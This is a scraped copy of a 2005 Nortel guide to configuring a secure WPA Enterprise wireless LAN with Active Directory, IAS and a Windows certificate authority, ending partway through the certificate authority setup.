DOC

csx_adaptive_for_ms_env

By Evelyn Richardson,2014-10-18 01:52
12 views 0
csx_adaptive_for_ms_env,adaptive,adaptive radiation,adaptivethreshold,adaptive vsync,adaptive filter,adaptive dmc,adaptive keys,otsu adaptive,adaptivekeyboard

    The Adaptive Wireless LAN COOKBOOK for Microsoft environment

    A total guide to setting up a secure Nortel Adaptive Wireless LAN in a Microsoft environment

Version 1.0

    thJanuary 4, 2005

K.P. Rao

    Core Systems Engineering

Abstract

    This document is intended to assist Sales Engineers and Nortel customers with configuring the Nortel Adaptive Wireless LAN solution in a Microsoft environment. Currently this information is scattered in various places and is very disjoint. The main objective of the document is to gather all these pieces together, provide clarification and show step by step how to build and to provide end to end configuration information, on the various pieces required to build the solution, in a logical manner.

Acknowledgements

    This document could not have been completed without the help of the following contributors and reviewers (listed in no certain order): Louis Denoncourt, Victor Ganjan, Douglas DiNunzio and Pam O‘Hagan

    Copyright ?

    All rights reserved. January 2005

    The information in this document is subject to change without notice. The statements, configurations, technical data, and recommendations in this document are believed to be accurate and reliable, but are presented without express or implied warranty. Users must take full responsibility for their applications of any products specified in this document. The information in this document is proprietary to Nortel Networks Inc.

    The software described in this document is furnished under a license agreement and may be used only in accordance with the terms of that license.

Trademarks

    Nortel Networks, the Nortel Networks logo, the Globemark, Unified Networks, and PASSPORT are trademarks of Nortel Networks.

Adobe and Acrobat Reader are trademarks of Adobe Systems Incorporate.

All other Trademarks are the property of their respective owners.

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 2

Table of Contents

ABSTRACT ............................................................................................................................................. 2

    ACKNOWLEDGEMENTS ................................................................................................................... 2

    COPYRIGHT ? ........................................................................................................................................ 2

    TRADEMARKS ........................................................................................................................................ 2

    INTRODUCTION .................................................................................................................................. 4

    LAB SETUP DIAGRAM ....................................................................................................................... 4

    CODE LEVELS USED IN THIS DOCUMENT .................................................................................. 4

    CONFIGURATION TASKS ................................................................................................................. 5

    PLANNING THE WIRELESS LAN ............................................................................................................. 5 DOMAIN CONTROLLER INSTALLATION AND CREATION OF USERS AND GROUPS ..................................... 6

    Creating Users and Groups .............................................................................................................. 7

    INSTALLING AND CONFIGURING THE CERTIFICATE AUTHORITY (CA) FOR THE DOMAIN ...................... 10

    EXPORTING THE ROOT CERTIFICATE ................................................................................................... 11 CONFIGURING THE DHCP SERVER ....................................................................................................... 13

    2230 boot up sequence .................................................................................................................... 13

    Configuring the DHCP relay .......................................................................................................... 14

    Layer 3 mode and DHCP interaction ............................................................................................. 15

    Provision the DHCP server ............................................................................................................ 15

    INSTALLING AND CONFIGURING THE 2270 / 2230 ................................................................................. 19 CONFIGURING THE IAS SERVER ........................................................................................................... 22 SETTING UP THE ROUTING & REMOTE ACCESS SERVICE ..................................................................... 30 TEST THE SOLUTION ....................................................................................................................... 31

    WINDOWS 2K AND NORTEL SUPPLICANT ............................................................................................. 31 WINDOWS XP AND NATIVE XP SUPPLICANT ....................................................................................... 34 THIS CONCLUDES THE SETUP AND TESTING OF CLIENTS. ............................................... 38

    REFERENCES ...................................................................................................................................... 39

    APPENDIX A: CONNECTION ACCEPT, REJECT LOGIC IN IAS ........................................... 40

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 3

Introduction

    With security related issues addressed, to a large extent, Wireless LAN is seeing an exponential growth in terms of Enterprise adoption and deployment. Seamless integration of Wireless LAN within an Enterprise infrastructure, with regards to single sign on and secure access is essential to provide end users a secure, safe and high user experience environment. A quick survey show that a large number of Enterprise‘s run a Microsoft

    environment with Active Directory as the corporate database, Exchange for e-mail, IAS for RADIUS server, MS DHCP and DNS servers. Nortel Networks Adaptive Wireless LAN portfolio not only seamlessly integrates into this environment but provides much more in terms of value added functions like rogue device location and detection, Auto RF to name a few. The technical details required for configuring the various backend components (DHCP, RADIUS and security) for the Nortel Adaptive Wireless LAN solution are scattered in various places. This multipart document is an attempt to consolidate all that information in a single place. Part I of the document will focus on how to setup an adaptive solution in L3 mode in a Microsoft environment. This document will not go into a detailed discussion on how to setup the environment. Details on how to setup the environment can be found in the references provided in the appendix.

Lab setup diagram

    The simulated Microsoft environment, as shown in the diagram below, uses Microsoft Windows 2000 server and 2003 server (Enterprise Edition). Services such as Domain Controllers, Active Directory, DNS, DHCP, and Internet Authentication Services (Microsoft‘s

    RADIUS server) are installed on these machines as shown in the diagram below.

Code levels used in this document

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 4

    The software revisions of various devices used in this document are as follows:

    ; Client OS & Supplicant Software:

    o Windows XP Professional SP2 with native supplicant

    o Windows 2K Professional SP4 with Nortel Network WLAN Mobility Adapter

    Utility

    ; Client Wireless Network Interface Card used for testing:

    o Nortel Networks Wireless LAN 2201

    ; Servers:

    o Windows 2003 Server with Service Pack 1

    o Windows 2000 Server with Service Pack SP4

     Microsoft IAS, DHCP and PKI o

    ; Nortel Adaptive Wireless LAN Equipment:

    o 2270 SW / RTOS / Bootloader version: 2.0.152.0

    o 2230 SW Version: 2.0.152.0 , Boot Version: 1.2.59.6

Configuration Tasks

    The steps involved in configuring the solution shown in the diagram can be broken down into the following tasks:

    1) Planning the Wireless LAN

    2) Domain controllers installation and creation of Users and Groups

    Install the CA (Certificate Authority) for the domain 3)

    4) Exporting the Root Certificate

    5) Install and configure DHCP server

    6) Install and configure the 2270 / 2230

    7) Configure the IAS (RADIUS) server

    8) Configure the clients

    9) Test the solution

     Planning the Wireless LAN

    An in-depth discussion of this topic is beyond the scope of this document. There are a number of guides and documents available from Nortel Networks to help you with planning a Wireless LAN. A few have been listed below and can be found @

    http://qos.ca.nortel.com/QoS-News.html

    ; Engineering a WLAN Network

    ; Straight Talk on Voice over Wireless LANs

    ; New QoS for Wi-Fi Multimedia paper

    For our case study, a site survey was done and the placement of the Access Ports determined accordingly. In the planning process, it was decided that the maximum level of security at layer 2 (of the OSI model) will be enforced using Enterprise mode WPA (Wi-Fi Protected Access). WPA addresses the security shortcomings of the Wired Equivalent Privacy (WEP) protocol in 802.11 based wireless networks. WPA is a subset of the 802.11i security standard. WPA uses TKIP (Temporal Key Integrity Protocol) which is designed to improve confidentiality and integrity of wireless LAN data. TKIP provides ―stronger‖ keys via

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 5

    a longer initialization vector and a per packet key-mixing function, stronger sequencing rules to prevent replay attacks, and employs a MIC (Message Integrity Code) checksum to ensure that the packet has not been altered in transit.

    WPA runs in two modes, namely a Pre-shared Key (PSK) mode and an Enterprise mode. PSK mode is geared for the SOHO market and basically means that the key is statically configured on the both the WLAN client and AP. In Enterprise mode the existing 802.1x (port-based access control), EAP (Extensible Authentication Protocol), and RADIUS protocols are used for authentication and distribution of a dynamically generated session key.

    Access ports will be (logically) placed inside the corporate LAN and the Wireless LAN will be treated as secure or trusted portion of the network. This is illustrated in the Network Topology shown in the Lab diagram section above.

Domain controller installation and creation of Users and Groups

    Domain Controllers store data and manage user and domain interactions including user logon processes, authentication and directory searches. To configure a server as a domain controller, install Active Directory on the server by running the Active Directory Installation Wizard. Details on how to go about installing Active Directory can be found @ http://www.microsoft.com . Alternately you can refer to the application notes below to obtain the same information.

    1) To install AD on Win 2K server http://worcester.us.nortel.com/AD-Win2000

    http://navigate.us.nortel.com/AD- Win2003 2) To install AD on Win 2003 server

    Typically, in a customer environment, domain controller(s) would already be installed and configured with user profiles. When adding Wireless LAN components to the network, it should be designed in such a way that network access method remains the same for end users. That is to say, whatever method was used to access the network via. wired LAN should also work for wireless LAN. Access to the network via Wireless LAN in a Microsoft environment, is treated as remote access. Network access is controlled, typically, by setting the dial-in-permission on the domain account of the user or computer. However, controlling access for a large number of users with this method is extremely cumbersome. Moreover, it is an ―all-or-nothing‖ setting, which means that you cannot allow VPN access while

    simultaneously blocking Wireless access (or vice versa) for a given user.

    Internet Authentication Service (IAS) allows you to control access to network services using groups associated with a remote access policy. This method is more flexible and much easier to manage because it allows you to use group memberships to govern access to a network service.

    With the user access methods mentioned above, two broad schemes are possible:

    1) In the first scheme, which is simple to manage, you allow all domain users and

    computers access to the WLAN. This can be accomplished by creating nested groups

    as shown in Table 1. For many organizations, controlling access through domain

    membership is a strong enough control and minimizes additional management

    overhead associated with the WLAN. The group in the first column, Wireless LAN

    Access, has two members listed in the second column namely, Wireless LAN Users

    and Wireless LAN Computers. These "First Level" groups themselves have members

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 6

    (shown in the third column Second Level Members‖) namely, the Domain Users

    and Domain Computers groups respectively. This arrangement of nested groups

    allows all users and computers in the domain to connect to the WLAN.

    Table 1: Wireless Access Groups to Allow All Users and Computers

    2) In the second scheme, if allowing all users and computers to access the WLAN is

    overly permissive for your organization, you can remove either or both Domain Users

    and Domain Computers from these groups. You will then need to add the specific user

    and computer accounts or groups to the Wireless LAN groups. Table 2 illustrates how

    to use the Wireless LAN Access group structure in this manner.

    Table 2: Wireless Access Groups to Allow Selected Users and Computers

    Corporate policy of a fictitious corporation dictates that all computers in the domain have wireless access but only certain users be allowed wireless access. This requires that we implement a combination of the two schemes as follows. At present, only three users from the domain are given access to the Wireless LAN for the trial as shown below.

    Second Level MembersSecond Level MembersTop LevelTop LevelFirst LevelFirst Level(Domain Global Groups)(Domain Global Groups)Universal GroupUniversal GroupMembers (DomainMembers (Domain(Granted Access(Granted AccessGlobal Groups)Global Groups)In RAP)In RAP)

    Wireless LAN Wireless LAN Wireless LAN Wireless LAN kraokraoAccessAccessUsersUserstbiggstbiggseleeelee

    Wireless Wireless krao-1krao-1Domain LAN LAN tbiggs-1tbiggs-1ComputersComputersComputerselee-1elee-1

    Now that we have our directory structure planned, we can now go ahead and create the users and the respective groups as shown above.

Creating Users and Groups

    Before we start creating users and groups, let us take a look at how the Domain Controllers are structured in our environment. We have two Domain Controllers in our network for

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 7

    redundancy. One of the Domain Controller runs on Windows 2000 server and its Domain operation mode is ―Native‖. The other Domain Controller runs on Windows 2003 server and its Domain operation mode is ―Windows 2000 native‖. This is shown in the diagram below.

    When the Domain Controller(s) are running in this mode, the default setting for Remote Access Permission in the Dial-in tab of user properties is set to ―Control access through Remote Access Policy‖. Thus, when provisioning users, we do not have to modify the Dial-in properties for allowing Remote Access Permission. For more details on how access control login works in IAS, see Appendix A: Connection accept, reject logic in IAS.

    Windows 2000 DC running in Windows 2003 DC running in

    Native ModeWindows 2000 native mode

    To add users / groups in Active Directory log on to any one of the Domain Controllers and, from the Start button, click on ―Programs ; Administrative Tools ; Active Directory Users

    and Computers‖.

    1. Right click on ―Users‖ folder and select ―New ; User‖. Add the user ―krao‖ as shown

    below. When finished creating user ―krao‖, add users ―tbiggs‖ and ―elee‖ in the same

    manner.

    2. Create the two groups ―Wireless LAN Users‖ and ―Wireless LAN Computers‖. These

    are the First Level groups. Make sure that the Group scope is Global and the Group

    type is Security. The creation of ―Wireless LAN Users‖ group is shown below. Create

    the ―Wireless LAN Computers‖ group in the same fashion.

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 8

    3. With the First Level group(s) in place, now we need to add users and computers to the

    appropriate groups. In the Active Directory Users and Computers dialogue box, locate

    the ―Wireless LAN Users‖ group and double click on it. Move to the Members tab. By

    default it will have the ―Domain Users‖ as members of the group. Remove it and add

    the users as shown below. Leave the default settings for the ―Wireless LAN

    Computers‖ group as it will have all ―Domain Computers‖ as member of the group.

    4. Once the First Level group(s) are created and populated with users and computers,

    we proceed to create the Top Level group. It is called ―Wireless LAN Access‖ and it is

    created with Group Scope as ―Universal‖ and Group Type ―Security‖. The First Level

    groups (Wireless LAN Users and Wireless LAN Computers) are made members of this

    (Wireless LAN Access) group as shown below.

    Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 9

    This completes configuration on the Domain Controller for users and groups.

Installing and configuring the Certificate Authority (CA) for the domain

    A server certificate needs to be issued to the RADIUS (IAS) server. The IAS server needs the certificate to create the encrypted tunnel (using TLS) between its client and itself (IAS). To provide such certificates, you have the choice to either install a CA yourself or buy the certificates from a commercial certificate provider. Both options are valid and choosing one over the other creates no real technical difference. The major pros and cons to using in

    house CA compared to buying certificates from a commercial provider are summarized in the following table.

    Table 3: Pros and Cons of Using Your Own CA vs. Commercial Certificates

    The balance of the argument depends on how complex and costly it is to manage your own CA. If the cost of setting up a local CA is low and the management is simple, it is often a more attractive proposition than purchasing external certificates.

    Since the CA software ships with standard Microsoft Windows 2000 or 2003 server, the fictitious organization decided to install an in-house CA because of the advantages inherent to it. Automatic enrollment and renewal of the IAS server certificate means that there is no manual certificate distribution to perform.

    A decision was made to install the CA on Windows 2000 Domain Controller. By default, the Certificate Services package is not installed. You will need the Windows 2000 installation media to install the package. Place the Windows 2000 installation media in the CD drive and go to Start ; Settings ; Control Panel ; Add/Remove Programs and install the package

    as shown below.

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 10

Report this document

For any questions or suggestions please email
cust-service@docsford.com